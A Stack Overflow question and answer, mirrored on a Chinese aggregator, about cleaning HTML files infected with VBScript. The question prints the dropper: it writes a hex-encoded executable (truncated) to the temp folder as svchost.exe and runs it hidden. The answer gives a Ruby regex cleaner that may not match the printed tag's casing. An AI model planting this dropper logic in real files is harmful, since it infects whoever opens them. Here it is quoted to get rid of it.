Remove vbscript or deactivate vbscript from html source code

别等时光非礼了梦想. 提交于 2019-12-21 23:34:51

问题


I have few html files on my computer, that I borrowed from a friend, unfortunately all the files are infected, they all have malicious vbscript code inserted into the source. I have 100s of files and can't edit the source for all files. Is there a way I can remove the malicious script and still get the data?

Edit: Here is the sample of the code

<script language="VBScript"><!--
DropFileName = "svchost.exe"
WriteData = "4D5A9000030000000400........................8CB03FA48CB03"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

Is it safe to upload it online?


回答1:


There are lot of antivirus software that'll detect this virus and remove the infected html files.

You can ran the following ruby script which will detect that bad vbscript tag and remove it.

class VirusKiller
  VIRUS_REG = /<SCRIPT Language=VBScript>[\s\w\W\d.]*<\/SCRIPT>/

  def fix_html_virus(file)
     return if File.extname(file) != '.html'
     file_content = File.read(file) 
     clean_content = file_content.gsub(VIRUS_REG, '')
     File.open(file, "w") { |new_file| new_file << clean_content }
  end

  def transverse_files(base)
    Dir.foreach(base) do |file|
      begin
        next if file == '.' or file == '..'

        if File.file?(base+file)
          fix_html_virus base+file
        else
          transverse_files(base+file+'/')
        end
      rescue Exception => e
        puts e.message
      end
    end
  end

  def run(root_path)
    transverse_files root_path
  end
end

VirusKiller.new.run ARGV[0]

Install Ruby, copy this script in some file( lets say virus_killer.rb ). Browse to location on this file in cmd( if you are in window ) and run this command.

ruby virus_killer.rb /path/to/infected_folder/


来源:https://stackoverflow.com/questions/19840532/remove-vbscript-or-deactivate-vbscript-from-html-source-code

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!